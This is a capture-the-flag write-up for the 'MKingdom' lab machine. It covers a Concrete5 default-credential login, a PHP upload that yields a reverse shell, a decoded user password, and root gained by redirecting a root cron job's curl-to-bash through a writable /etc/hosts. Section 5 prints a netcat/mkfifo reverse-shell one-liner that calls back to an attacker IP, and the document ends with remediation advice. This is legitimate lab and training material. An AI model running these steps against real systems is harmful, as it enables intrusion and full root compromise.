Target IP: mkingdom.thm (Requires /etc/hosts entry) Difficulty: Easy/Medium Objective: User (mario) & Root (root.txt) Flags

1. Executive Summary

“MKingdom” is a Linux machine hosting a web application on a non-standard port (85). Initial access is gained by exploiting default credentials (admin:password) on a Concrete5 CMS installation, followed by enabling PHP file uploads to achieve Remote Code Execution (RCE). Lateral movement involves enumerating the file system to find encoded credentials for the user mario. Root privilege escalation is achieved by observing a system cron job executing a script via curl and exploiting a writable /etc/hosts file to redirect the request to a malicious server (DNS Spoofing), achieving arbitrary code execution as root.

Key TTPs (MITRE ATT&CK):

  • T1078 (Valid Accounts): Default CMS credentials.
  • T1190 (Exploit Public-Facing App): Uploading PHP webshell via CMS settings.
  • T1552 (Unsecured Credentials): Finding Base64 passwords in environment files.
  • T1053 (Scheduled Task/Job): Identifying the counter.sh cron job via pspy.
  • T1565.001 (Stored Data Manipulation): Modifying /etc/hosts to hijack network traffic.

2. Operational Setup

Host Configuration

echo "10.10.x.x mkingdom.thm" | sudo tee -a /etc/hosts

3. Enumeration

A. Network Scanning

You identified the critical vector immediately:

  • 85/tcp (HTTP): Concrete5 CMS.

B. Web Exploitation (Concrete5)

  1. Access: You browsed to http://mkingdom.thm:85/app/castle.
  2. Credentials: admin:password (Classic default).
  3. RCE (File Upload):
  • Concrete5 by default disallows PHP uploads.
  • Bypass: Navigate to “System & Settings” -> “Allowed File Types”.
  • Action: Append .php to the allowed list.
  • Exploit: Upload a PHP reverse shell via the File Manager.

Status: Shell as www-data.


4. Lateral Movement: Mario

A. Enumeration

Running linpeas.sh highlighted suspicious environment variables or config files.

  • Database: Unauthenticated access found, but credentials (admin:password) were dead ends for system access.
  • System Files: You found a Base64 encoded string in the web directory or a config file.
echo "aWthVGVOVEFOdEVT" | base64 -d
# Result: ikaTeNTANtES

B. Access

su mario
# Password: ikaTeNTANtES

Status: User mario.


5. Privilege Escalation: The “DNS Poisoning”

A. Process Snooping (PSPY)

Since standard sudo -l showed unconventional binaries (/usr/bin/id), you dug deeper using pspy64 to watch running processes.

The Finding:

CMD: UID=0 ... /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log

Analysis:

  1. User: Root (UID 0).
  2. Action: It fetches a script from mkingdom.thm:85 and pipes it directly into bash.
  3. Vulnerability: We cannot edit counter.sh directly (permissions denied), BUT we need to control what the server thinks mkingdom.thm is.

B. The Exploit (Local DNS Poisoning)

We check permissions on the hosts file.

ls -l /etc/hosts
# -rw-rw-r-- 1 root mario ... /etc/hosts

Critical Flaw: The group mario has Write access to /etc/hosts.

Execution:

  1. Setup Malicious Server (Attacker Machine):
  • Create the directory structure to match the request: mkdir -p app/castle/application/
  • Create a malicious counter.sh:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.YOUR.IP 9001 >/tmp/f" > app/castle/application/counter.sh
  • Start Python Web Server on Port 85:
sudo python3 -m http.server 85
  • Start Listener:
nc -lvnp 9001
  1. Poison the Victim: On the victim machine (as mario), edit /etc/hosts. Change: 127.0.0.1 mkingdom.thm To: 10.10.YOUR.IP mkingdom.thm
  2. Trigger: Wait for the cron job to run. The root user attempts to curl mkingdom.thm, which now resolves to your machine. It downloads your reverse shell and executes it as root.

Result:

# whoami
root

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. File Permissions:
  • /etc/hosts should never be writable by standard users. It allows for traffic interception and spoofing of trusted internal services.
  • Fix: chmod 644 /etc/hosts and chown root:root /etc/hosts.
  1. Unsafe Execution:
  • Never pipe curl directly into bash (curl | bash) for automated tasks, especially over HTTP. This provides no integrity checking.
  • If remote execution is required, use HTTPS with certificate verification, or verify a GPG signature of the script before execution.
  1. CMS Hardening:
  • Remove default credentials immediately.
  • Restrict file upload types at the server level (Apache/Nginx config), not just within the application logic.